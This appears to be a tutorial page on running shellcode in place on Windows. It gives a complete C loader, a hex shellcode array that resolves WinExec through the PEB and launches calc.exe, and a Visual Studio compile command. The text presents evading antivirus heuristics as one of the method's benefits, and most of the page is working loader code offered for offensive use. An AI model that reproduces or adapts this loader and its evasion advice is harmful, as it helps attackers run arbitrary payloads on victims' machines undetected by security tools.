Simple Loader Alternative

Alternative Shellcode Execution Method

In addition to the simple loader example provided above, another approach to executing shellcode within a process is to directly execute the shellcode from its location in memory without copying it. This method simplifies the loader by avoiding the use of memory copying functions and relies on modifying memory protection settings to allow execution. Below is an example of how this alternative shellcode execution can be implemented.

Alternative Shellcode Loader Example

#include <windows.h>

unsigned char shellcode[] =
"\x48\x83\xec\x28\x48\x8d\x15\x17\x01\x00\x00\x48\x8d\x0d\x03\x01"
"\x00\x00\xe8\x45\x00\x00\x00\x49\x89\xc7\x48\x8d\x0d\xf4\x00\x00"
"\x00\xff\xd0\x48\x8d\x15\x05\x01\x00\x00\x48\x8d\x0d\xe4\x00\x00"
"\x00\xe8\x26\x00\x00\x00\x48\x8d\x0d\xfa\x00\x00\x00\xba\x01\x00"
"\x00\x00\xff\xd0\x48\x8d\x15\xf5\x00\x00\x00\x48\x8d\x0d\xc3\x00"
"\x00\x00\xe8\x05\x00\x00\x00\x48\x31\xc9\xff\xd0\x48\x83\xec\x28"
"\x65\x4c\x8b\x04\x25\x60\x00\x00\x00\x4d\x8b\x40\x18\x4d\x8d\x60"
"\x10\x4d\x8b\x04\x24\xfc\x49\x8b\x78\x60\x48\x89\xce\xac\x84\xc0"
"\x74\x23\x8a\x27\x80\xfc\x61\x7c\x03\x80\xec\x20\x38\xc4\x75\x08"
"\x48\xff\xc7\x48\xff\xc7\xeb\xe5\x4d\x8b\x00\x4d\x39\xe0\x75\xd6"
"\x48\x31\xc0\xeb\x6b\x49\x8b\x58\x30\x44\x8b\x4b\x3c\x49\x01\xd9"
"\x49\x81\xc1\x88\x00\x00\x00\x45\x8b\x29\x4d\x85\xed\x74\x51\x4e"
"\x8d\x04\x2b\x45\x8b\x71\x04\x4d\x01\xee\x41\x8b\x48\x18\x45\x8b"
"\x50\x20\x49\x01\xda\xff\xc9\x4d\x8d\x0c\x8a\x41\x8b\x39\x48\x01"
"\xdf\x48\x89\xd6\xa6\x75\x08\x8a\x06\x84\xc0\x74\x09\xeb\xf5\xe2"
"\xe6\x48\x31\xc0\xeb\x1a\x45\x8b\x48\x24\x49\x01\xd9\x66\x41\x8b"
"\x0c\x49\x45\x8b\x48\x1c\x49\x01\xd9\x41\x8b\x04\x89\x48\x01\xd8"
"\x48\x83\xc4\x28\xc3\x4b\x45\x52\x4e\x45\x4c\x33\x32\x2e\x44\x4c"
"\x4c\x00\x4c\x6f\x61\x64\x4c\x69\x62\x72\x61\x72\x79\x41\x00\x57"
"\x69\x6e\x45\x78\x65\x63\x00\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"
"\x45\x78\x69\x74\x50\x72\x6f\x63\x65\x73\x73\x00";

void ExecuteShellcode() {
    // Directly cast the shellcode array to a function pointer and execute it
    DWORD oldProtect;
    
    // Change the protection on the shellcode memory to be executable
    VirtualProtect(shellcode, sizeof(shellcode), PAGE_EXECUTE_READWRITE, &oldProtect);
    
    // Execute the shellcode
    ((void(*)())shellcode)();
    
    // Restore the old protection
    VirtualProtect(shellcode, sizeof(shellcode), oldProtect, &oldProtect);
}

int main() {
    ExecuteShellcode();
    return 0;
}

Compiling the Loader

To compile this C program on a Windows system using Visual Studio from the command line, you can use the following command:

cl /EHsc /W4 /Fe:program.exe program.c

Explanation and Benefits

This alternative method of executing shellcode differs from the original simple loader in several key ways:

  1. Memory Allocation and Copying:
    • Original Method: The original simple loader uses VirtualAlloc to allocate new memory in the process’s address space and RtlMoveMemory to copy the shellcode into this newly allocated memory. This involves multiple steps: allocating memory, copying data, and then executing the shellcode.
    • Alternative Method: The alternative method skips the memory allocation and copying steps by executing the shellcode directly from the memory location where it is already stored (in this case, the global shellcode array).
  2. Memory Protection:
    • Original Method: Both methods involve changing the memory protection settings to make the memory executable. In the original method, this is done after copying the shellcode into the allocated memory.
    • Alternative Method: In the alternative method, the memory protection of the existing memory (where the shellcode array resides) is modified directly, making it executable.
  3. Code Simplification:
    • Original Method: The original method requires more lines of code due to the need to allocate, copy, and then execute the shellcode.
    • Alternative Method: The alternative method is more straightforward as it reduces the number of operations by executing the shellcode in place.

Benefits of the Alternative Method

  • Simplicity: The alternative method is simpler because it avoids the need for memory allocation and copying, reducing the overall complexity of the code.
  • Efficiency: By skipping memory allocation and copying, this method can be more efficient in terms of both memory and CPU usage.
  • Less Detectable: Because the alternative method does not involve VirtualAlloc or RtlMoveMemory, which are common functions used in many malicious loaders, it may be less likely to trigger heuristic-based detection mechanisms in some antivirus solutions.

When to Use Which Method

  • Original Method: The original method is useful when you need to inject shellcode into a different memory region or process, where you have more control over the execution environment.
  • Alternative Method: The alternative method is best suited for scenarios where the shellcode can be executed directly in the context of the current process and does not require relocation or additional memory management.

Both methods have their use cases depending on the specific requirements of the shellcode execution scenario. The alternative method provides a more streamlined approach for cases where simplicity and direct execution are desired.

This explanation and code provide a clear comparison between the original simple loader and the alternative method, highlighting the differences in approach and the specific benefits of the latter. This should help readers understand when and why they might choose one method over the other.

Scroll to Top